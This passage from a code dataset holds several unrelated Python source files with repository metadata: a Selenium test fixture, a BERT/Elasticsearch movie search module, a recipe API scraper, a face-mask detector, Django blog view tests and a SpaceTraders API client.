"usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 91, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 95, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 115, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "18901794784", "text": "import pytest\nfrom selenium import webdriver\n\nfrom tests.test_news import TestOne\nfrom utilities.BaseClass import BaseClass\n\ndriver = None\n\n\ndef pytest_addoption(parser): # cmd: py.test --browser_name chrome --window_size desktop\n parser.addoption(\"--browser_name\", action=\"store\", default=\"chrome\")\n # parser.addoption(\"--window_size\", action=\"store\", default=\"desktop\")\n\n\n@pytest.fixture(scope=\"class\")\ndef setup(request):\n global driver\n browser_name = request.config.getoption(\"--browser_name\")\n if browser_name == \"chrome\":\n driver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\") # local path! (change accordingly)\n elif browser_name == \"firefox\":\n driver = webdriver.Firefox(executable_path=\"C:\\\\geckodriver.exe\") # local path!\n elif browser_name == \"IE\":\n driver = webdriver.Ie(executable_path=\"C:\\\\IEDriverServer.exe\") # local path!\n # other possible browsers: safari, microsoft edge, opera etc.\n driver.get(\"https://finansavisen.no/\")\n\n # # ask Filip how to implement this the 'right' way\n # testOne = TestOne()\n # window_size = request.config.getoption(\"--window_size\")\n # if window_size == \"desktop\":\n # driver.maximize_window()\n # testOne.test_newsDesktop()\n # elif window_size == \"tablet\":\n # driver.set_window_size(1366, 768)\n # # upon doing some manual checks, tablet resolutions share same class names with desktop resolutions\n # testOne.test_newsDesktop()\n # elif window_size == \"mobile\":\n # driver.set_window_size(360, 640)\n # testOne.test_newsMobile()\n\n request.cls.driver = driver\n yield\n driver.close()\n\n\n# pasted code for screenshots when tests fail\n# commented cause not really needed, hard to tell from screenshots what went wrong in this case\n\n# @pytest.mark.hookwrapper\n# def pytest_runtest_makereport(item):\n# \"\"\"\n# Extends the PyTest Plugin to take and embed screenshot in html report, whenever test fails.\n# :param item:\n# \"\"\"\n# pytest_html = item.config.pluginmanager.getplugin('html')\n# outcome = yield\n# report = outcome.get_result()\n# extra = getattr(report, 'extra', [])\n#\n# if report.when == 'call' or report.when == \"setup\":\n# xfail = hasattr(report, 'wasxfail')\n# if (report.skipped and xfail) or (report.failed and not xfail):\n# file_name = report.nodeid.replace(\"::\", \"_\") + \".png\"\n# _capture_screenshot(file_name)\n# if file_name:\n# html = '<div><img src=\"%s\" alt=\"screenshot\" style=\"width:304px;height:228px;\" ' \\\n# 'onclick=\"window.open(this.src)\" align=\"right\"/></div>' % file_name\n# extra.append(pytest_html.extras.html(html))\n# report.extra = extra\n#\n# def _capture_screenshot(name):\n# driver.get_screenshot_as_file(name)\n", "repo_name": "lucijacovic/qa-task", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 20, 
"usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.Ie", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "12899325921", "text": "import re\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom app import tokenizer,model\nfrom app import pca, min_val, max_val\nfrom sklearn.preprocessing import MinMaxScaler\nfrom app import es\n\nmax_length = 40 # bert ���子向量的最大值\ninput_length = 23 # torch.Size([43486, 23, 768]) 这个要跟中间的23长度对应(第四个代码框),因为description里面长度影响结果\nn_components = 900 #PCA降维后的维度\nmovie_num = 43449 # movie number\nindex_name = \"movie_es_data\"\n# input_sentence means the description user input\n# host is:'http://localhost:9200'\n\n# 需要保存三个文件 第一个是pca矩阵 第二个是normalized的最大值最小值数组\n\ndef remove_punctuation(text):\n cleaned_text = re.sub(r'[^\\w\\s]', '', text)\n cleaned_text = re.sub(r'[^\\x00-\\x7F]+', '', cleaned_text) # Remove Chinese garbled characters\n return cleaned_text\n\ndef get_normalized_data(input_sentence):\n input_tokens = tokenizer.encode_plus(\n input_sentence,\n truncation=True,\n max_length=input_length - 2, # Consider adding the length of the start and end tags\n padding='max_length',\n return_tensors='pt'\n )\n\n input_ids = input_tokens['input_ids'] # Enter the encoding of the sentence\n\n # Add start and end tags to the beginning and end of the input sentence\n if len(input_ids) < input_length:\n input_ids = torch.cat(\n [torch.tensor([tokenizer.cls_token_id]), input_ids.squeeze(), torch.tensor([tokenizer.sep_token_id])])\n # attention_mask = torch.cat([torch.tensor([1]), attention_mask.squeeze(), torch.tensor([1])])\n\n # If the length of the input sentence is less than input length, fill it in\n if len(input_ids) < input_length:\n num_pad_tokens = input_length - len(input_ids)\n input_ids = F.pad(input_ids, (0, num_pad_tokens), value=tokenizer.pad_token_id)\n # attention_mask = F.pad(attention_mask, (0, num_pad_tokens), value=0)\n\n # Converts the input to a tensor and gets an embedded representation\n input_ids = input_ids.unsqueeze(0)\n # attention_mask = attention_mask.unsqueeze(0)\n\n with torch.no_grad():\n input_outputs = model(input_ids)\n input_embedding = input_outputs.last_hidden_state.squeeze(0)\n\n embedding_np = input_embedding.detach().numpy().reshape(-1).tolist()\n\n # Convert embedding_np to a NumPy array\n embedding_np_array = np.array(embedding_np)\n\n # The transformation was performed using the previously trained PCA model\n input_pca = pca.transform(embedding_np_array.reshape(1, -1))\n\n # Use MinMaxScaler for standardization\n scaler2 = MinMaxScaler(feature_range=(-1, 1))\n scaler2.data_min_ = min_val\n scaler2.data_max_ = max_val\n\n normalized_data = (input_pca - min_val) / (max_val - min_val)\n\n # Convert the result to a 1x900 list\n normalized_data_list = np.squeeze(normalized_data).tolist()\n\n return normalized_data_list\n\ndef es_search_bert(query_vector, k):\n query = {\n \"query\": {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": \"cosineSimilarity(params.query_vector, 'sentenceVectors') + 1.0\",\n \"params\": {\"query_vector\": query_vector}\n }\n }\n },\n \"size\": k\n }\n 
results_all = es.search(index=index_name, body=query)\n results_movieId = []\n if results_all['hits']['total']['value'] > 0:\n for hit in results_all['hits']['hits']:\n movie_id = hit['_source']['movieId']\n movie_name = hit['_source']['movieName']\n similarity = hit['_score']\n results_movieId.append(movie_id)\n print(f\"Movie ID: {movie_id} - Movie Name: {movie_name} - Similarity: {similarity}\")\n else:\n print(\"No movies found matching the input keywords.\")\n return results_movieId\n", "repo_name": "movieRecommendHKU/Search-module", "sub_path": "flaskProject/sentenceSearch.py", "file_name": "sentenceSearch.py", "file_ext": "py", "file_size_in_byte": 3914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "app.tokenizer.encode_plus", "line_number": 26, "usage_type": "call"}, {"api_name": "app.tokenizer", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "app.tokenizer.cls_token_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.tokenizer", "line_number": 39, "usage_type": "name"}, {"api_name": "app.tokenizer.sep_token_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.pad", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 45, "usage_type": "name"}, {"api_name": "app.tokenizer.pad_token_id", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.tokenizer", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 52, "usage_type": "call"}, {"api_name": "app.model", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "app.pca.transform", "line_number": 62, "usage_type": "call"}, {"api_name": "app.pca", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 65, "usage_type": "call"}, {"api_name": "app.min_val", "line_number": 66, "usage_type": "name"}, {"api_name": "app.max_val", "line_number": 67, "usage_type": "name"}, {"api_name": "app.min_val", "line_number": 69, "usage_type": "name"}, {"api_name": "app.max_val", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 72, "usage_type": "call"}, {"api_name": "app.es.search", "line_number": 89, "usage_type": "call"}, {"api_name": "app.es", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "654669276", "text": "import numpy as np\nimport os\nimport json\nimport requests\nfrom tqdm import tqdm\nimport time\nfrom random import randint\n\ndef get_url(url, retry=True, time_out=3, n=3):\n\tif n==0:\n\t\treturn None\n\ttry:\n\t\treturn requests.get(url, timeout=time_out).json()\n\texcept Exception:\n\t\tprint(\"[Error] Raised Exception on {}..\".format(url))\n\t\tif retry:\n\t\t\tprint(\"[Error] Retrying on {}\".format(url))\n\t\t\treturn get_url(url, retry, time_out, n=n-1)\n\t\telse:\n\t\t\traise Exception\n\napi_id = 'INSERT_API_ID'\napi_key = 'INSERT_API_KEY'\ndata_folder = './data/lists/'\nres_folder = './data/recipes/'\n\nfor cuisine_result_filename in os.listdir(data_folder):\n\tif not cuisine_result_filename.split('.')[-1] == 'json':\n\t\tcontinue\n\tfile_path = os.path.join(data_folder, 
cuisine_result_filename)\n\tprint('[Info] Reading results from {}'.format(cuisine_result_filename))\n\twith open(file_path) as jf:\n\t\tresults = json.load(jf)['matches']\n\n\tfor result in tqdm(results):\n\t\tid_ = result['id']\n\t\turl = 'http://api.yummly.com/v1/api/recipe/{}?_app_id={}&_app_key={}'.format(id_, api_id, api_key)\n\t\tjson_file = os.path.join(res_folder, id_+'.json')\n\t\tif os.path.exists(json_file):\n\t\t\tcontinue\n\t\trecipe_info = get_url(url)\n\t\tif recipe_info is None:\n\t\t\tcontinue\n\t\tif not os.path.exists(res_folder):\n\t\t\tos.mkdir(res_folder)\n\t\twith open(json_file, 'w') as jf:\n\t\t\tjson.dump(recipe_info, jf)\n\t\ttime.sleep(randint(0,3))", "repo_name": "alialamiidrissi/ADA_Course_Project", "sub_path": "Project/spider2.py", "file_name": "spider2.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "12016435636", "text": "import cv2\nfrom fastai.vision import *\nimport torch\n\n\n#face_cascade=cv2.CascadeClassifier(\"./app/model/haarcascade_frontalface_default.xml\")\n#ds_factor=0.75\n#face_mask_learn = load_learner('./app/model')\nclass FaceBio():\n def __init__(self):\n # self.device = torch.device('cpu')\n\n # self.mtcnn = MTCNN(\n # image_size=160, margin=0, min_face_size=20,\n # thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n # device=self.device\n # )\n\n #self.resnet = InceptionResnetV1(pretrained='vggface2').eval().to(self.device)\n self.face_cascade=cv2.CascadeClassifier(\"./app/model/haarcascade_frontalface_default.xml\")\n self.face_mask_learn = load_learner('./app/model')\n\n\n def detect_faces(self, image):\n '''Detect face in an image'''\n \n faces_list = []\n\n t = torch.tensor(np.ascontiguousarray(np.flip(image, 2)).transpose(2,0,1)).float()/255\n img = Image(t) # fastai.vision.Image, not PIL.Image\n pred_class, pred_idx, outputs = self.face_mask_learn.predict(img)\n \n if(str(pred_class) == 'mask'):\n color = (0, 255, 0)\n label = True\n else:\n color = (0, 0, 255)\n label = False\n\n #faces, probs = self.mtcnn.detect(image)\n\n # Convert the test image to gray scale (opencv face detector expects gray images)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect multiscale images (some images may be closer to camera than others)\n # result is a list of faces\n faces = 
self.face_cascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5);\n\n # If not face detected, return empty list \n if len(faces) == 0:\n #face_dict['label'] = label\n #faces_list.append(face_dict)\n return faces_list, label\n else:\n for i in range(0, len(faces)):\n (x, y, w, h) = faces[i]\n #print(x, y, w, h)\n face_dict = {}\n face_dict['face'] = gray[int(y):int(y) + int(w), int(x):int(x) + int(h)]\n face_dict['rect'] = (x, y, w, h)\n #face_dict['label'] = label\n #face_dict['color'] = color\n faces_list.append(face_dict)\n\n # Return the face image area and the face rectangle\n return faces_list, label\n\n def draw_frame(self, image, rect):\n (x, y, w, h) = rect\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 255), 2) \n #cv2.putText(image, label, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, color, 2)\n\n", "repo_name": "aastroza/Face-Mask-Detector", "sub_path": "app/faceDetector.py", "file_name": "faceDetector.py", "file_ext": "py", "file_size_in_byte": 2628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "39250445043", "text": "from django.http import response\nfrom blogs_app.views import *\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, get_user, get_user_model\nfrom django.contrib.auth.models import User\nfrom django.test import Client\nfrom blogs_app.models import BlogpostModel\nfrom django.contrib.auth.models import Permission\n\nclass BlogCreationViewTest(TestCase):\n \"\"\"Test Blog creation test view\n\n Required setting permission -- can_post_blogpost\"\"\"\n\n def setUp(self):\n \"\"\"Sets test data:\n creates:\n self.user -- User object\n self.blog_data -- dictionary, contains data for creating new blogpost\n self.img_data -- string, contains image address for image file\"\"\"\n self.url = '/create_blog/'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_blogpost')\n user.user_permissions.add(permission)\n user.save()\n self.blog_data = {'title': 'testtitle', 'contents': 'testcontents'}\n self.img_data = 'blogs_app/tests/test_img.png'\n\n def test_user_created_correctly(self):\n \"\"\"Test if self.user set correctly\"\"\"\n self.assertEqual(self.user.username, \"testuser\")\n self.assertEqual(self.user.has_perm(\"blogs_app.can_post_blogpost\"), True)\n logged_user = self.client.login(username=\"testuser\", password=\"testpassword\")\n self.assertTrue(logged_user)\n\n def test_page_return_403_if_not_logged(self):\n \"\"\"Test if PermissionDenied rises if user is not logged\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 403)\n\n def test_page_return_200_if_logged(self):\n \"\"\"Test if Blog creation view render correctly\n\n self.user -- User object\n self.url -- string, contains page's URL\"\"\"\n self.client.force_login(self.user)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n 
self.assertTemplateUsed(response, 'blogs_app/create_blog.html')\n\n def test_post_new_blog(self):\n \"\"\"Test blog creation POST method\n\n self.user -- User object\n self.url -- string, contains page's URL\n self.blog_data -- dictionary, contains data for blog creation\n self.img_data -- string, contains test_img file path\n\n Do user login\n Make post with self.blog_data and image img_data\n Check responses\n Check redirection responses\"\"\"\n self.client.force_login(self.user)\n with open(self.img_data, 'rb') as img:\n response = self.client.post(self.url,\n {'title': self.blog_data['title'],\n 'contents': self.blog_data['contents'],\n 'image': img})\n self.assertEqual(response.status_code, 302)\n with open(self.img_data, 'rb') as img:\n redirect_response = self.client.post(self.url,\n {'title': self.blog_data['title'],\n 'contents': self.blog_data['contents'],\n 'image': img},\n follow=True)\n self.assertEqual(redirect_response.status_code, 200)\n self.assertTemplateUsed(redirect_response, 'blogs_app/blog_list.html')\n self.assertContains(redirect_response, 'testtitle')\n\n\nclass BlogListViewTest(TestCase):\n \"\"\"Test Blogs list page\"\"\"\n\n def test_list_view_get_method(self):\n \"\"\"Test blog list view get method\"\"\"\n url = '/blog/'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_list.html')\n\n\nclass BlogDetailsViewTest(TestCase):\n \"\"\"Test Blog detailed view page\"\"\"\n def setUp(self):\n \"\"\"Setting up test data\n\n self.url -- string\n self.user -- User object, has permission can_post_comment\n self.blog -- BlogpostModel object\n self.comment -- CommentaryModel object\n\n Create self.user\n Set password for the self.user\n Set permission for the self.user\n Login self.user\n Create self.blog\n Check if self.blog created\"\"\"\n self.url = '/blog/1'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_comment')\n user.user_permissions.add(permission)\n user.save()\n self.client.force_login(self.user)\n self.blog = BlogpostModel(title='testtitle',\n contents='testcontents',\n author=self.user)\n self.blog.save()\n self.comment = CommentaryModel.objects.create(author=self.user,\n blogpost=self.blog,\n comment_body=\"First comment\",\n )\n self.comment_data = {'comment_body': 'Second comment'}\n # Test if self.blog is created normaly\n new_blog= BlogpostModel.objects.get(title=\"testtitle\")\n self.assertEqual(new_blog.title, \"testtitle\")\n self.assertEqual(new_blog.contents, \"testcontents\")\n self.assertEqual(new_blog.id, 1)\n\n def test_blog_details_page_response(self):\n \"\"\"Test blog details page GET response\n self.url -- string, contains page's URL\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_details.html')\n self.assertContains(response, 'testtitle')\n self.assertContains(response, 'First comment')\n\n def test_blog_details_page_post_method(self):\n \"\"\"Test blog details page POST response\n self.url -- string, contains page's URL\n self.comment_data -- Dictionary, contains data for creating comment\"\"\"\n response = self.client.post(self.url, self.comment_data, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_details.html')\n 
self.assertContains(response, 'testtitle')\n self.assertContains(response, 'First comment')\n self.assertContains(response, 'Second comment')\n\n\nclass UploadCSVFileViewTest(TestCase):\n \"\"\"Test Uploading CSV file\"\"\"\n def setUp(self):\n \"\"\"Setting up test data\n\n self.url -- string, contains url address\n self.user -- User object\n self.file_root -- string, contains file address\"\"\"\n self.url = '/create_blog/csv'\n self.file_root = 'blogs_app/tests/test_csv.csv'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_blogpost')\n user.user_permissions.add(permission)\n user.save()\n self.client.force_login(self.user)\n\n def test_upload_csv_file_view_get(self):\n \"\"\"Test Upload csv file GET response\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/csv_upload.html')\n\n def test_upload_csv_file_view_post(self):\n \"\"\"Test Upload csv file POST response\"\"\"\n with open(self.file_root, 'r') as csv:\n response = self.client.post(self.url, {'file': csv})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateNotUsed(response, 'blogs_app/csv_upload.html')\n self.assertContains(response, 'Blogs have been created successfully')\n", "repo_name": "GeorgeKuzora/blog_site_project", "sub_path": "blogs_app/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 8127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 52, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 52, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 73, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 85, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 91, "usage_type": "name"}, {"api_name": 
"django.http.response.status_code", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 92, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 93, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 96, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 117, "usage_type": "name"}, {"api_name": "blogs_app.models.BlogpostModel", "line_number": 121, "usage_type": "call"}, {"api_name": "blogs_app.models.BlogpostModel.objects.get", "line_number": 131, "usage_type": "call"}, {"api_name": "blogs_app.models.BlogpostModel.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "blogs_app.models.BlogpostModel", "line_number": 131, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 139, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 140, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 141, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 142, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 143, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 149, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 152, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 153, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 154, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 157, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 170, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 171, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 171, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 178, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 179, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 179, 
"usage_type": "name"}, {"api_name": "django.http.response", "line_number": 180, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 185, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 186, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 186, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 187, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 188, "usage_type": "argument"}]} +{"seq_id": "70405856806", "text": "from typing import List\n\nfrom space_traders.client import Client\nfrom space_traders.models import (\n AgentContract,\n ApiError,\n Contract,\n ContractCargo,\n)\nfrom space_traders.utils import paginator\n\n\nclass ContractApi:\n def __init__(self, client: Client) -> None:\n self.client = client\n self.base_endpoint = \"/my/contracts\"\n\n async def accept_contract(\n self, contract_id: str\n ) -> AgentContract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/accept\"\n response = await self.client.send(\"post\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return AgentContract(**response[\"data\"])\n\n async def deliver_cargo_to_contract(\n self,\n contract_id: str,\n ship_id: str,\n item_id: str,\n units: int,\n ) -> ContractCargo | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/deliver\"\n data = {\"shipSymbol\": ship_id, \"tradeSymbol\": item_id, \"units\": units}\n response = await self.client.send(\"post\", endpoint, data=data)\n if \"error\" in response.keys():\n return ApiError(**response)\n return ContractCargo(**response[\"data\"])\n\n async def fulfill_contract(\n self, contract_id: str\n ) -> AgentContract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/fulfill\"\n response = await self.client.send(\"post\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return AgentContract(**response[\"data\"])\n\n async def get_contract(self, contract_id: str) -> Contract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}\"\n response = await self.client.send(\"get\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return Contract(**response[\"data\"])\n\n async def list_all_contracts(self) -> List[Contract] | ApiError:\n response = await paginator(self.client, \"get\", self.base_endpoint)\n if isinstance(response, ApiError):\n return response\n return [Contract(**c) for c in response]\n", "repo_name": "dpnetca/space_trader", "sub_path": "space_traders/api/contract_api.py", "file_name": "contract_api.py", "file_ext": "py", "file_size_in_byte": 2163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "space_traders.client.Client", "line_number": 14, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 24, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 25, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 20, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 20, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 38, "usage_type": "call"}, {"api_name": "space_traders.models.ContractCargo", "line_number": 39, "usage_type": "call"}, {"api_name": "space_traders.models.ContractCargo", "line_number": 33, "usage_type": "name"}, 
{"api_name": "space_traders.models.ApiError", "line_number": 33, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 47, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 48, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 43, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 43, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 54, "usage_type": "call"}, {"api_name": "space_traders.models.Contract", "line_number": 55, "usage_type": "call"}, {"api_name": "space_traders.models.Contract", "line_number": 50, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 50, "usage_type": "name"}, {"api_name": "space_traders.utils.paginator", "line_number": 58, "usage_type": "call"}, {"api_name": "space_traders.models.ApiError", "line_number": 59, "usage_type": "argument"}, {"api_name": "space_traders.models.Contract", "line_number": 61, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "space_traders.models.Contract", "line_number": 57, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "12534389935", "text": "from __future__ import print_function\n\nimport json\nimport mock\nimport os\n\nfrom chromite.cbuildbot import cbuildbot_unittest\nfrom chromite.cbuildbot import commands\nfrom chromite.cbuildbot.stages import generic_stages_unittest\nfrom chromite.cbuildbot.stages import 